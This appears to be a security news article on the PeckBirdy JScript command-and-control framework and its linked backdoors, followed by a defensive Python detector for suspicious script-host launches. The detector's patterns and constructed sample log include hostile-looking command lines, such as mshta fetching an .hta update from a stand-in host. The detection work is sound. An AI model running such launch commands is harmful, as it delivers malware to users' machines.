Cybersecurity researchers have found that China-aligned APT actors have been using PeckBirdy, a JScript-based command-and-control (C2) framework, to target various environments since 2023. According to Trend Micro, the adaptable framework has been used against Chinese gambling industries and in malicious activity targeting Asian governments and private organizations. Researchers Ted Lee and Joseph C. Chen write: "PeckBirdy is a script-based framework which, while possessing advanced capabilities, is implemented using JScript, an old script language."
"This is to guarantee that the framework could be launched via LOLBins (living-off-the-land binaries) across various execution environments." The cybersecurity firm claimed to have discovered the PeckBirdy script framework in 2023 after seeing malicious scripts being injected into several Chinese gambling websites. These scripts are intended to download and run the main payload in order to enable the remote delivery and execution of JavaScript.
This routine's ultimate objective is to present phony Google Chrome software update webpages in order to deceive users into downloading and executing phony update files, thereby infecting computers with malware.
An exploitation script for a Google Chrome vulnerability in the V8 engine (CVE-2020-16040, CVSS score: 6.5) that was fixed in December 2020 was discovered to be hosted on one of PeckBirdy's servers connected to the SHADOW-VOID-044 campaign. Other scripts observed include:

- Social engineering pop-up scripts that deceive victims into downloading and running malicious files
- Backdoor delivery scripts that use Electron JS
- Scripts to create reverse shells over TCP sockets

Two backdoors, HOLODONUT and MKDOOR, were discovered as a result of additional infrastructure analysis. HOLODONUT is a .NET-based modular backdoor that can load, run, or remove various plugins obtained from the server.
MKDOOR is a modular backdoor that can load, execute, or remove various modules obtained from the server. SHADOW-VOID-044 and SHADOW-EARTH-045 may be connected to various nation-state actors with ties to China.
The following hints served as the basis for this evaluation: "These campaigns make use of a dynamic JavaScript framework, PeckBirdy, to abuse living-off-the-land binaries and deliver modular backdoors such as MKDOOR and HOLODONUT," Trend Micro concluded.

Detecting malicious JavaScript frameworks remains a major challenge because they rely on dynamically generated, runtime-injected code and leave no persistent file artifacts, which allows them to circumvent conventional endpoint security controls.
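Because the script itself may never touch disk, one of the few durable signals a defender has is the process-creation event in which a script-host LOLBin (wscript.exe, cscript.exe, mshta.exe) is started in an unusual way: handed a URL rather than a local file, given an explicit JScript engine switch, launched by a browser or Office process, or running a script out of a temp or AppData path. The following Python is an added example written for this article, not Trend Micro's code or a detection from the report; the log format, field names, the `SUSPICIOUS_PARENTS` list and the heuristics are all assumptions, and the sample events are constructed, not real telemetry.

```python
"""
Flag Windows process-creation events where a script-host LOLBin is launched
in a way consistent with runtime-delivered JScript/HTA payloads.

Event format (constructed for this example, loosely modelled on Sysmon
Event ID 1 fields, not any product's real schema):
    Image=<path>|CommandLine=<cmd>|ParentImage=<path>
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Parents from which a script host should rarely be spawned on a workstation (assumption).
SUSPICIOUS_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe",
                      "winword.exe", "excel.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Explicit engine selection (//E:JScript) or inline protocol handlers on the command line.
ENGINE_RE = re.compile(r"//E:JScript|javascript:|vbscript:", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(js|jse|hta)\b", re.IGNORECASE)
STAGING_PATH_RE = re.compile(r"\\(temp|appdata)\\", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str


def parse_event(line):
    """Parse one 'Key=Value|Key=Value' event line (constructed format)."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcessEvent(fields["Image"], fields["CommandLine"], fields["ParentImage"])


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons this event looks like LOLBin-hosted script execution.

    An empty list means the event is not a script host or shows none of the heuristics.
    """
    reasons = []
    if basename(ev.image) not in SCRIPT_HOSTS:
        return reasons
    cmd = ev.command_line
    if URL_RE.search(cmd):
        reasons.append("script host given a URL instead of a local file")
    if ENGINE_RE.search(cmd):
        reasons.append("explicit script engine or protocol handler on command line")
    parent = basename(ev.parent_image)
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"script host spawned by {parent}")
    if SCRIPT_EXT_RE.search(cmd) and STAGING_PATH_RE.search(cmd):
        reasons.append("script file executed from a temp or AppData path")
    return reasons


def detect(lines):
    """Run score_event over raw log lines; return (host, reasons) for each hit."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((basename(ev.image), reasons))
    return hits


# Constructed sample events: one benign logon script, two suspicious launches,
# and one non-script-host process that the detector should ignore.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\wscript.exe|CommandLine=wscript.exe C:\Program Files\Vendor\logon.vbs|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe http://update.example.invalid/chrome_update.hta|ParentImage=C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"Image=C:\Windows\System32\wscript.exe|CommandLine=wscript.exe //E:JScript C:\Users\alice\AppData\Local\Temp\upd.js|ParentImage=C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -File C:\Scripts\backup.ps1|ParentImage=C:\Windows\System32\svchost.exe",
]

if __name__ == "__main__":
    for host, reasons in detect(SAMPLE_LOG):
        print(host)
        for r in reasons:
            print("  -", r)
```

Each hit carries every heuristic that fired rather than a single boolean, so an analyst can tune or weight the reasons separately; the benign vendor logon script and the PowerShell backup job produce no hit, while the mshta-with-URL and the JScript-from-Temp launches are each flagged with several reasons.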